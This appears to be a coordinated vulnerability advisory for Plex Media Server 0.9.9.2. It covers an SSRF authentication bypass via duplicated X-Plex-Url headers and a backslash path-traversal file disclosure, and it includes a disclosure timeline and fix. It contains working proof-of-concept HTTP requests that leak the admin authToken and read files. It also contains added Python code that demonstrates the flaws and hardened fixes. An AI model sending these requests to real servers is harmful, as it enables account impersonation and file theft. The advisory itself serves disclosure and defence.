title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."
URL: https://en.wikipedia.org/wiki/Plex_(software)
By making Plex Media Server request content from 127.0.0.1 on the attacker's
behalf, an attacker can bypass all authentication and execute commands with
administrative privileges.
Plex "Remote" servers (thousands of them can be found via Shodan and Google;
none of them were accessed) are affected by both vulnerabilities as well.
GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
The last X-Plex-Url header value, "http://my.plexapp.com/", matches the
whitelist (a regular expression) and passes validation. The request is then
processed by the actual request handler in the backend webserver (Python),
where both header values are concatenated with a comma. The URL that is
actually requested is therefore controlled by the first X-Plex-Url value.
Because the first value ends in a query parameter (called IRRELEVANT), the
appended second X-Plex-Url value becomes part of the query string and is
effectively neutralised.
This results in the following request (made by Plex Media Server):
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip
The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.
<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>
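The mismatch above (the check looks at the last header value, the fetch uses the comma-joined list) can be reproduced in a few lines. The following is an added illustration, not code from Plex or from the advisory: the whitelist regular expression is assumed, since the advisory does not print it, and the header list is constructed to mirror the proof of concept. The hardened variant shows the fix a reviewer would ask for: refuse repeated X-Plex-Url headers and validate the exact string that is about to be fetched rather than one of its components.

```python
import re
from urllib.parse import urlsplit

# Stand-in for the advisory's whitelist regex (assumed; the real expression is not given).
ALLOWED_URL_RE = re.compile(r"^https?://my\.plexapp\.com/")


def plex_url_values(headers):
    """All X-Plex-Url values, in the order they appeared on the wire."""
    return [v for k, v in headers if k.lower() == "x-plex-url"]


def frontend_check(headers):
    """Flawed validation as the advisory describes it: only the last value is checked."""
    values = plex_url_values(headers)
    return bool(values) and ALLOWED_URL_RE.match(values[-1]) is not None


def backend_target(headers):
    """Backend behaviour as described: repeated header values are joined with a comma."""
    return ",".join(plex_url_values(headers))


def vulnerable_flow(headers):
    """Host the server would actually connect to after the flawed check, or None if rejected."""
    if not frontend_check(headers):
        return None
    return urlsplit(backend_target(headers)).hostname


def hardened_flow(headers):
    """Reject repeated headers and validate the single string that will be fetched."""
    values = plex_url_values(headers)
    if len(values) != 1:
        return None
    parts = urlsplit(values[0])
    if parts.scheme not in ("http", "https") or parts.hostname != "my.plexapp.com":
        return None
    return parts.hostname


# Constructed header list mirroring the advisory's proof of concept (not a real capture).
CONSTRUCTED_HEADERS = [
    ("Host", "plex.example.invalid"),
    ("X-Plex-Url", "http://localhost:32400/myplex/account?IRRELEVANT="),
    ("X-Plex-Url", "http://my.plexapp.com/"),
]

# A constructed legitimate request with a single header.
LEGITIMATE_HEADERS = [
    ("Host", "plex.example.invalid"),
    ("X-Plex-Url", "http://my.plexapp.com/"),
]

if __name__ == "__main__":
    print("vulnerable flow fetches from:", vulnerable_flow(CONSTRUCTED_HEADERS))  # localhost
    print("hardened flow, crafted request:", hardened_flow(CONSTRUCTED_HEADERS))   # None
    print("hardened flow, legitimate request:", hardened_flow(LEGITIMATE_HEADERS))  # my.plexapp.com
```

Pinning the hostname closes this particular bypass, but it is not a complete server-side request forgery defence on its own: a proxy that follows redirects or resolves the name at fetch time still needs the redirect target and the resolved address checked against the same policy.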
A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8
GET /manage/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
GET /web/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
GET /:/resources/…\…\…\…\…\…\…\…\…\…\secret.txt HTTP/1.1
Host: <HOST>
The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.
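For the file disclosure, the defensive counterpart is a path mapper that never lets a request path climb out of the handler's document root. The block below is an added example written for this advisory, not Plex code; the document root "/srv/plex/web" and the request paths are constructed. It treats backslashes as separators (the proof of concept relies on them, and Windows accepts both), decodes percent-encoding once as a web server would, and rejects any segment that is only dots or spaces, since Windows strips trailing dots and spaces from names and would otherwise let variants of ".." through.

```python
import posixpath
from urllib.parse import unquote


def safe_join(root, requested):
    """Map a request path onto a file under `root`; return None if it would escape.

    Both '/' and '\\' count as separators. Returns a POSIX-style path string so the
    result is the same on every platform.
    """
    decoded = unquote(requested)  # one level of percent-decoding, as the server would apply
    safe_parts = []
    for segment in decoded.replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue  # empty (doubled separator) and current-directory segments are harmless
        if segment.strip(". ") == "":
            return None  # '..', '...', '.. ' and similar: traversal or Windows-normalised traversal
        if ":" in segment:
            return None  # drive letters (C:) and NTFS alternate data streams (name:stream)
        safe_parts.append(segment)
    return posixpath.join(root, *safe_parts)


# Constructed request paths; the first three mirror the shape of the advisory's requests.
CONSTRUCTED_REQUESTS = {
    "backslash traversal": "..\\..\\..\\..\\secret.txt",
    "forward-slash traversal": "css/../../../secret.txt",
    "percent-encoded traversal": "%2e%2e/%2e%2e/secret.txt",
    "drive letter": "C:\\secret.txt",
    "legitimate asset": "js/app.js",
}

if __name__ == "__main__":
    for label, path in CONSTRUCTED_REQUESTS.items():
        print(f"{label:28s} -> {safe_join('/srv/plex/web', path)}")
```

On a real server this logical check is the first layer; the handler should additionally resolve the candidate with os.path.realpath and confirm it still starts with the resolved root, which also covers symbolic links inside the document root. Access logs of the /manage/, /web/ and /:/resources/ handlers containing ".." or "%2e%2e" sequences are the obvious indicator that someone is probing for this issue.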
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.
2014-02-09: Contacting vendor through [email protected] and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendor provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.
Update to a more recent version of Plex Media Server (e.g. 0.9.9.5).
No workaround available.
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to [email protected]
EOF Stefan Viehbock / @2014